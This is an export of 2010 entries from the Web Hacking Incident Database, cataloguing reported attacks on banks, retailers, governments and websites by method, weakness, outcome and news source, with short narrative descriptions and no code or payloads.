Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 1200000
Additional Link:
Entry Title: WHID 2010-49: Hackers pluck 8,300 customer logins from bank server
WHID ID: 2010-49
Date Occured: 1/12/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: NY, USA
Incident Description: Hackers have stolen the login credentials for more than 8,300 customers of a small New York bank after breaching its security and accessing a server that hosted its online banking system. The intrusion at Suffolk County National Bank happened over a six-day period that started on November 18, according to a release (PDF) issued Monday. It was discovered on December 24 during an internal security review. In all, credentials for 8,378 online accounts were pilfered, a number that represents less than 10 percent of SCNB's total customer base.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/01/12/bank_server_breached/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 8300
Additional Link:
Entry Title: WHID 2010-48: Hackers brute force their way into galeton.com website containing names, credit card numbers
WHID ID: 2010-48
Date Occured: 2/8/2010
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: Hackers used brute force to log into web accounts of users at www.galeton.com.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://datalossdb.org/incidents/2692-hackers-brute-force-their-way-into-website-containing-names-credit-card-numbers
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-47: Court papers: JC Penney was hacking victim
WHID ID: 2010-47
Date Occured: 10/23/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: JC Penney Co. was one of the victims of notorious computer hacker Albert Gonzalez, according to unsealed documents made available on Monday by a federal judge in Boston. Penney, which during Gonzalez' trial had asked the U.S. District Court for the District of Massachusetts to bar the government from disclosing its identity, was revealed in the documents to be the company that had been known throughout the trial as "Company A." ICQ chat logs confirm SQL Injection was used - http://datalossdb.org/system/jcp_attachment.pdf
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.msnbc.msn.com/id/36088614/ns/technology_and_science-security/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://datalossdb.org/incident_highlights/48
Entry Title: WHID 2010-46: Microsoft's Larry "Major Nelson" Hryb has online account hijacked through Xbox.com as part of underground group's publicity bid.
WHID ID: 2010-46
Date Occured: 3/29/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description: Xbox Live director of programming Larry Hryb has for some time now been the face of Microsoft's online platform for the Xbox 360, thanks in large part to his Major Nelson persona. Unfortunately, Xbox Live's figurehead saw his gamertag defaced over the weekend after a hacker was able to log into Hryb's account.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.gamespot.com/news/6254330.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-45: Online Thieves Take $205,000 Bite Out of Missouri Dental Practice
WHID ID: 2010-45
Date Occured: 3/30/2010
Attack Method: Banking Trojan
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: Missouri, USA
Incident Description: Organized computer criminals yanked more than $200,000 out of the online bank accounts of a Missouri dental practice this month, in yet another attack that exposes the financial risks that small- to mid-sized organizations face when banking online. Smile Zone is still investigating how the thieves compromised the account. But in case after case I’ve reported on involving this type of fraud, the attackers hacked the victim’s computer networks using a Trojan horse program known as Zeus or Zbot, which allows the criminals to tunnel back through the victim’s PC in order to log into the target account without raising red flags or additional security mechanisms.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.krebsonsecurity.com/2010/03/online-thieves-take-205000-bite-out-of-missouri-dental-practice/
Attack Source Geography:
Attacked System Technology:
Cost: $205000
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-44: Baidu hacked by Iranian Cyber Army
WHID ID: 2010-44
Date Occured: 1/12/2010
Attack Method: Weak Password Recovery Validation
Application Weakness: Insufficient Process Validation
Outcome: Downtime
Attacked Entity Field: Internet
Attacked Entity Geography: China
Incident Description: The attack, which took place overnight, saw a message from the Iranian Cyber Army appear on the Baidu home page. It featured a picture of the Iranian flag, and a message written in Farsi. Here’s how Baidu alleges the hacker got access to the domain name account of one of the world’s most popular web sites in under an hour: 1. Hacker starts online chat session with Register.com representative, claiming to be an agent of Baidu. 2. Register.com representative asks hacker to provide verification information. Hacker provides invalid information, but Register.com goes ahead and e-mails a security code to the email address it has on file for Baidu anyway. 3. The hacker doesn’t have access to that e-mail address, so he/she relays a bogus security code to the Register.com representative via chat. Baidu claims the representative didn’t bother to compare the code to the actual one. 4. Hacker asks Register.com representative to change email address on file to antiwahabi2008@gmail.com, and representative does. 5. Hacker now uses “forgot password” link at Register.com to request the username and password to the account. Hacker can then log in and change the name servers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.telegraph.co.uk/technology/news/6974129/Baidu-hacked-by-Iranian-Cyber-Army.html
Attack Source Geography: Iran
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://domainnamewire.com/2010/02/24/how-baidu-got-hacked-by-the-iranian-cyber-army/
Entry Title: WHID 2010-43: Sleuths Trace Digital Clues to Predict iPad Sales
WHID ID: 2010-43
Date Occured: 3/19/2010
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Entropy
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: To get the ball rolling on the iPad estimate, Mr. Tello asked participants on a private message board for Apple watchers, AAPL Sanity, to share the order number that the Apple Store assigns to each online purchase and includes on the order's email confirmation. The first order submitted, from a user named Joe, had an eight-digit order number 68,715,XXX (the last three digits have been excised) at 8:30 a.m. Eastern time on March 12, the first day iPad orders could be placed. Another order placed five days later, by a user named Israel, was numbered 68,937,XXX. That is a difference of about 222,000.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://online.wsj.com/article/SB10001424052748704207504575130351672451186.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-42: Frenchman Arrested After Hacking Into Obama's Twitter Accounts
WHID ID: 2010-42
Date Occured: 3/25/2010
Attack Method: Brute Force
Application Weakness: Insufficient Password Recovery
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: A Frenchman will face trial after hacking into Twitter accounts, including that of U.S. President Barack Obama, a French prosecutor said. The 24-year-old man from central France was arrested on Tuesday and could face up to two years in prison in France for fraudulent access to a computer system. The arrest followed a joint operation between the Federal Bureau of Investigation and the French police, according to French state prosecutor Jean-Yves Coquillat. The man, whose name hasn't been released, is charged with having hacked into the Twitter Inc. social-networking accounts of famous people. He did this in April 2009 after posing as a site administrator, said Mr. Coquillat. As well as Mr. Obama's account, he hacked into that of singer Britney Spears, he said.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://online.wsj.com/article/SB10001424052748704094104575143391819054502.html
Attack Source Geography: France
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link: http://techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/
Entry Title: WHID 2010-41: NineMSN compromised
WHID ID: 2010-41
Date Occured: 2/17/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Internet
Attacked Entity Geography: Australia
Incident Description: Microsoft's Ninemsn, one of the most visited portals in Australia (Alexa rank 573), was compromised and injected with malicious code. The malicious code was identified to be part of the Gumblar mass injections.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.itwire.com/business-it-news/security/36912-ninemsn-compromised
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-40: TCS Website Hacked, Domain Name Up For Sale
WHID ID: 2010-40
Date Occured: 2/8/2010
Attack Method: DNS Hijacking
Application Weakness: Insufficient Process Validation
Outcome: Defacement
Attacked Entity Field: Technology
Attacked Entity Geography: India
Incident Description: Indian software giant Tata Consultancy Services Ltd. (TCS) has witnessed the hijacking of its official website www.tcs.com. The hackers not only attacked the website but also allegedly changed its domain name and put it up for sale!
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.techtree.com/India/News/TCS_Website_Hacked_Domain_Name_Up_For_Sale/551-109190-643.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-39: Tesda Website hacked again; users directed to Smartmatic
WHID ID: 2010-39
Date Occured: 1/11/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Philippines
Incident Description: Even before its administrators could fix the problem, the website of the Technical Education and Skills Development Authority was hacked again early Monday, this time redirecting visitors to the website of Smartmatic, the contractor tasked to implement the automated elections this May. A check of the hacked TESDA website's homepage showed the hackers left instructions for the site to redirect to Smartmatic's website in 20 seconds.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.gmanews.tv/story/181244/tesda-website-hacked-again-users-redirected-to-smartmatic
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-38: Cross-Site Scripting through Flash in Gmail Based Services
WHID ID: 2010-38
Date Occured: 3/22/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Leakage of Information
Attacked Entity Field: Information Services
Attacked Entity Geography:
Incident Description: An IBM security researcher outlines the XSS vulnerability he found, which exploits a Flash file-upload movie by passing JavaScript through its external parameters.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.watchfire.com/wfblog/2010/03/cross-site-scripting-through-flash-in-gmail-based-services.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-37: ING Shareholder Data Exposed on Website
WHID ID: 2010-37
Date Occured: 1/25/2010
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography:
Incident Description: On January 25, an ING customer discovered that she could access client information on the ingfunds.com web site and notified her stockbroker. In investigating the situation, ING discovered that since August 2008, a file containing the names, addresses, Social Security numbers, and account numbers of 106 ING shareholders had been available on the web through a search engine. The company notified the New Hampshire Attorney General on February 3 that 17 residents of the state were affected.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://doj.nh.gov/consumer/pdf/ing.pdf
Attack Source Geography: New Hampshire, USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-36: Durex condom orders leak on web – customer (update 1)
WHID ID: 2010-36
Date Occured: 3/22/2010
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: India
Incident Description: Last week, this site received a lead about a security problem involving the web site of a Durex product. On March 5, a customer reportedly discovered that anyone could view his and other customers’ orders on the kohinoorpassion.com web site by simply inserting a different order ID number in the url without any login required. Names, addresses, phone numbers, and type of products ordered were all there for ready viewing.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.databreaches.net/?p=10726
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-35: CISO Witnesses Hack Like No Other
WHID ID: 2010-35
Date Occured: 3/3/2010
Attack Method: Content Spoofing
Application Weakness: Insufficient Anti-automation
Outcome: Loss of Sales
Attacked Entity Field: Government
Attacked Entity Geography: PA, USA
Incident Description: Here's what Maley told attendees of an RSA Conference panel on state cybersecurity on Wednesday: "We saw thousands of hits on our Department of Transportation driver license exam scheduling site coming out of Russia, the same thing over and over, scheduling driver license exams. It was encrypted traffic, and we were trying to figure out what the heck is going on. Were they trying to test our systems? What exactly were they up to? The answer was, we really didn't know." Authorities eventually discovered that the hacker, who used a proxy server in Russia to mask his identity, owned a driving school in Philadelphia and exploited a vulnerability in the driving test scheduling system to allow the scheduling of more tests than the allotted time slots. It could take upward of six weeks to schedule a driving test in Philadelphia. Said Maley: "What he was doing was saying (to potential customers), 'You go over across the street, to John's driver training, and it's going to take you six to eight weeks to get your test. We can get you in tomorrow.'"
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.bankinfosecurity.com/posts.php?postID=469
Attack Source Geography: PA, USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-34: Over 120 000 Sanoma User Credentials Stolen
WHID ID: 2010-34
Date Occured: 3/23/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Entertainment
Attacked Entity Geography: Finland
Incident Description: Not exactly startup news per se, but a healthy reminder to all those working with user credentials in their online services. One of the largest, if not the largest, online identity thefts has just occurred in Finland. The breached service was Älypää, a gaming site bought by Sanoma. The sad part is that while an identity breach of this magnitude is always bad, this one has been made worse by Sanoma actually storing the passwords in plain text, making them usable anywhere.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.arcticstartup.com/2010/03/23/over-120-000-sanoma-user-credentials-stolen/?ref=rc
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-33: N.Y. Firm Faces Bankruptcy from $164,000 E-Banking Loss
WHID ID: 2010-33
Date Occured: 2/15/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: NY, USA
Incident Description: A New York marketing firm that as recently as two weeks ago was preparing to be acquired now is facing bankruptcy from a computer virus infection that cost the company more than $164,000. Immediately before the fraud occurred, Mrs. McCarthy found that her Windows PC would no longer boot, and that the computer complained it could not find vital operating system files. “She was using it one day and then this blue screen of death just came on her screen,” said a longtime friend who was helping McCarthy triage her computer. Later, McCarthy’s friend would confirm that her system had been infected with the ZeuS Trojan, a potent family of malware that steals passwords and lets cyber thieves control the infected host from afar. ZeuS also includes a feature called “kill operating system,” which criminals have used in prior bank heists to effectively keep the victim offline and buy themselves time to make off with the cash. Karen McCarthy said TDBank has dug in its heels and is now saying it has no responsibility for the loss.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.krebsonsecurity.com/2010/02/n-y-firm-faces-bankruptcy-from-164000-e-banking-loss/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-32: Crooks Crank Up Volume of E-Banking Attacks
WHID ID: 2010-32
Date Occured: 2/23/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: Ohio, USA
Incident Description: Computer crooks stole more than $200,000 from an auto body shop in Ohio last month in a brazen online robbery. The attack is yet another example of how thieves are using malicious software to bypass bank security technologies that are often touted as strong deterrents to this type of fraud. The story outlines banking Trojan activity that intercepted the one-time passcode and then redirected the real user to a fake maintenance page.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.krebsonsecurity.com/2010/03/crooks-crank-up-volume-of-e-banking-attacks/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-31: Organized Crooks Hit Ark. Utility
WHID ID: 2010-31
Date Occured: 3/4/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: Arkansas, USA
Incident Description: In a separate incident on March 4, organized crooks stole roughly $130,000 from North Garland County Regional Water District, a public, nonprofit utility in Hot Springs, Ark. Again, thieves somehow broke into the utility’s online bank account and set up unauthorized transfers to more than a dozen individuals around the country that were not affiliated with the district. Manager Bill Reinhardt said the district is still investigating how the thieves gained access to its accounts, and that it had notified the FBI about the breach. Reinhardt said the district has so far worked with its bank to reverse about half of the fraudulent transfers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.krebsonsecurity.com/2010/03/organized-crooks-hit-nj-town-arizona-utility/#more-1918
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-30: Organized Crooks Hit NJ Town
WHID ID: 2010-30
Date Occured: 3/19/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: New Jersey, USA
Incident Description: The Federal Bureau of Investigation and the Atlantic County Prosecutor's Office are helping Egg Harbor Township police investigate what township police said was an "outside intrusion into a municipal banking account" that was to blame for missing municipal funds. In a statement, the township police also warned the public that computer criminals have become more sophisticated. "Emails can appear to originate from your bank, or other legitimate location, and when opened can cause great financial damage," the department wrote. "Use extra care with your email and where you may send/enter any personal information."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.pressofatlanticcity.com/news/top_three/article_35e425d8-32f2-11df-a24f-001cc4c03286.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://www.krebsonsecurity.com/2010/03/organized-crooks-hit-nj-town-arizona-utility/
Entry Title: WHID 2010-29: Conservatives embarrassed as hackers exploit loophole on anti-union website
WHID ID: 2010-29
Date Occured: 3/23/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: United Kingdom
Incident Description: It was hoped that visitors to the website - http://cash-gordon.com - would use popular social networking websites such as Twitter and Facebook to spread the word about Gordon Brown’s union links. One of its features displayed any message posted on Twitter if it included the term “#cashgordon”, no matter what else it said. By writing Twitter messages containing “#cashgordon” and their own piece of web code, they were able to redirect visitors to any other site on the internet. Anyone who tried to access the Cash Gordon website for more than an hour was sent elsewhere, such as to the Labour Party’s site or to hardcore pornography pages.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.telegraph.co.uk/technology/twitter/7499228/Conservatives-embarrassed-as-hackers-exploit-loophole-on-anti-union-website.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-28: Bank sues victim of $800,000 cybertheft
WHID ID: 2010-28
Date Occured: 1/26/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: TX, USA
Incident Description: A Texas bank is suing a customer hit by an $800,000 cybertheft incident in a case that could test the extent to which customers should be held responsible for protecting their online accounts from compromises. The incident, which was first reported by blogger Brian Krebs this week, involves Lubbock-based PlainsCapital bank and its customer Hillary Machinery Inc. of Plano. In November, unknown attackers based in Romania and Italy initiated a series of unauthorized wire transfers from Hillary's bank accounts and depleted it by $801,495. About $600,000 of the amount was later recovered by PlainsCapital.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.computerworld.com/s/article/9149218/Bank_sues_victim_of_800_000_cybertheft
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-27: Poughkeepsie, N.Y., slams bank for $378,000 online theft
WHID ID: 2010-27
Date Occured: 2/8/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: NY, USA
Incident Description: The theft of $378,000 from the town of Poughkeepsie, N.Y., is prompting questions about the responsibility of banks to protect customer accounts from online criminals. In a statement last week, a Poughkeepsie town official revealed that thieves had broken into the town's TD Bank NA account and transferred $378,000 to accounts in the Ukraine.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.computerworld.com/s/article/9153598/Poughkeepsie_N.Y._slams_bank_for_378_000_online_theft
Attack Source Geography: Ukraine
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-26: Russia Arrests Alleged Mastermind of RBS WorldPay Hack
WHID ID: 2010-26
Date Occured:
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: Georgia, USA
Incident Description: A fascinating story about a group of hackers who broke into the RBS WorldPay DBs through SQL Injection. Russian authorities have nabbed the man accused of masterminding a coordinated global ATM heist of $9.5 million from Atlanta-based card processing company RBS WorldPay. The hackers compromised RBS WorldPay’s database encryption to raise the amount of funds available on the compromised cards and boost their daily withdrawal limits. In some cases, the hackers raised the limits to $500,000. According to the indictment, Tsurikov conducted reconnaissance of the RBS network after Covelin provided him with information about vulnerabilities in the system. Pleshchuk and Covelin then worked on exploiting the vulnerabilities to obtain access. Pleshchuk allegedly developed the method for reverse engineering the encrypted PINs. Once the hackers raised the account limits, they provided an army of cashers with 44 cards programmed with the account details. On November 8 that year, the cashers simultaneously hit more than 2,000 ATMs, netting about $9.5 million in less than 12 hours. The story did not specify the exact vulnerabilities exploited to manipulate the DB; however, the indictment PDF (in the reference) lists actual SQL commands sent to the DBs (pages 10-11). If you then cross-reference this story with WHID entry 2009-51, where the Romanian hacker Unu released SQL Injection vulns in RBS WorldPay web applications, it seems most plausible that these Russian hackers used similar vulnerabilities.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.wired.com/threatlevel/2010/03/alleged-rbs-hacker-arrested
Attack Source Geography: Russia
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://www.wired.com/images_blogs/threatlevel/2009/11/rbs-worldpay-indictment.pdf
Entry Title: WHID 2010-25: Flawed Security Exposes Vital Software to Hackers
WHID ID: 2010-25
Date Occured: 3/5/2010
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Technology
Attacked Entity Geography:
Incident Description: McAfee, a leading maker of Internet security software, warned this week that software systems used by many companies to store and manage their intellectual property are being actively targeted by hackers and are in need of significantly increased security focus. McAfee took issue with Perforce’s implementation of access controls. For instance, using the Web interface, someone who manages to access one user account could access those of other users by manipulating the associated URL, or Web address, it said. Perforce responded that, if customers choose the system's most restrictive mode, that situation isn’t possible.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://bits.blogs.nytimes.com/2010/03/05/flawed-security-exposes-vital-software-to-hackers/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://graphics8.nytimes.com/packages/pdf/technology/20100306Aurora.pdf
Entry Title: WHID 2010-24: Singapore's biggest forum, Hardwarezone Forums, gets hacked (friendly)
WHID ID: 2010-24
Date Occured: 3/18/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Retail
Attacked Entity Geography: Singapore
Incident Description: Yesterday, shortly after 8pm, a member "gameboyz" quickly discovered that he could inject HTML code into the Tag Board Chat, and posted a script that changed the contents of the page where the tagboard appeared, with a message below it, when one accessed certain sections of the site.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://asia.cnet.com/blogs/rehashplus/post.htm?id=63017848&scid=hm_bl
Entry Title: WHID 2010-23: Beware: Malware Attacks Facebook, B-Ball & Gossip Sites
WHID ID: 2010-23
Date Occured: 3/19/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Information Services
Attacked Entity Geography:
Incident Description: At a time when college basketball fans are going wild, cybercriminals are actively pursuing opportunities for scams. Basketball fans go online to fill out bracket selections, and when they do, hackers are also playing their own game of spamdexing, i.e. manipulating search results to promote sites, according to James Duldulao, a security researcher at McAfee. In this case, he explained, cybercriminals are spamdexing malware-infected sites. This week, the top results for terms like "ncaa bracket" and "march madness predictions" were poisoned. McAfee reports that five out of the first 10 hot searches on Google Trends are being promoted by a network of legitimate sites that were hacked to serve malware. One site had an embedded Flash file that downloads malware from another site and installs it without user interaction.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.toptechnews.com/story.xhtml?story_id=11000CA733W8&full_skip=1
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-22: Hackers target SDP leaders
WHID ID: 2010-22
Date Occured: 3/21/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: Finland
Incident Description: At least two leading figures in the opposition Social Democratic Party were attacked by computer hackers during the weekend. On Sunday, the web pages of the party’s Parliamentary group chairman Eero Heinäluoma were hacked, and on Saturday evening it was the turn of the party’s chairwoman Jutta Urpilainen. Strange pictures and text had appeared on Heinäluoma’s page www.heinaluoma.net on Sunday, and shortly before 4 p.m. his web page was no longer accessible. On Saturday evening, Urpilainen’s page had been targeted with obscene messages and child pornography. The pages crashed at about 10:00 p.m.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.hs.fi/english/article/Hackers+target+SDP+leaders+/1135254873196
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-21: Wiseguys Tickets charged with hacking into Ticketmaster, LiveNation to illegally grab best seats
WHID ID: 2010-21
Date Occured: 3/1/2010
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Loss of Sales
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description: This entry is related to WHID 2008-48 (http://www.xiom.com/whid-2008-48); however, it expands beyond only TicketMaster to include LiveNation. Prosecutors said the men hired a hacker in Bulgaria to program a way around the "CAPTCHA" technology that requires ticket buyers to read and retype two distorted random words to prove they are people, not a computer program. In a spectacular irony, the defendants managed to take a process meant to distinguish between a human and a machine - and automate it. The indictment said they even programmed their bots to make mistakes so they would appear to be human ticket buyers. When the bots swarmed a Web site, they were able to fill out the CAPTCHA fields in a twinkling, beating any real human buyers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.nydailynews.com/news/ny_crime/2010/03/01/2010-03-01_wiseguys_tickets_charged_with_hacking_into_ticketmaster_livenation_to_illegally_.html
Attack Source Geography: Bulgaria
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-20: Jewish Community Assistance Group Website Hacked
WHID ID: 2010-20
Date Occured: 3/21/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Religious
Attacked Entity Geography: Israel
Incident Description: The internet website of the Keren Kehilot organization was hacked Sunday morning by a gang of Muslim hackers, apparently from Turkey.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.israelnationalnews.com/News/Flash.aspx/182976
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-19: Hacked personal data originating from China
WHID ID: 2010-19
Date Occured: 3/22/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: Korea
Incident Description: According to police, Chinese hackers have been targeting Web sites of Korean department stores and other frequently visited sites. The hackers offer the Korean information for sale on the Internet. Last September, a used-car trading Web site and the Internet home page for a car navigation manufacturer were victims of Chinese hackers who stole names and residential registration numbers of 910,000 online members. Hackers can use the stolen registration numbers to become members of certain Web sites that send spam messages, or sell the numbers to other hackers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://joongangdaily.joins.com/article/view.asp?aid=2918142
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-18: Hackers crash Aussie charity websites
WHID ID: 2010-18
Date Occured: 3/22/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Health
Attacked Entity Geography: Australia
Incident Description: The internet services of two Australian autism support organisations have been crashed by computer hackers and a third may also have fallen victim, raising fears of a targeted attack to coincide with autism month. Autism Spectrum Australia (ASPECT), the country's autism service provider, is losing hundreds of dollars in online donations each day after its website was hit by hackers early on Sunday.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.stuff.co.nz/technology/3486923/Hackers-crash-Aussie-charity-websites
Attack Source Geography: USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-17: Govt websites hacked
WHID ID: 2010-17
Date Occured: 3/20/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Bangladesh, India
Incident Description: Bangladesh government websites, operating out of the Prime Minister's Office, were attacked on Saturday by hackers purporting to be "Indian". bdnews24.com, at around 2.30am, found that 19 out of 64 district web portals had been hacked by "MIL INDIAN HACKER", threatening "cyber war" in retaliation to any terrorist attack by Pakistan on Indian soil "via Bangladesh". Most of the sites were fixed around 16 hours later, said officials, who in some cases had first been notified of the cyber attack by bdnews24.com's online report. The hacked portals displayed a poster on opening, which said: "28 DIFFERENT STATES, 28 DIFFERENT LANGUAGES BUT ONE WORD JAI HIND!"
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
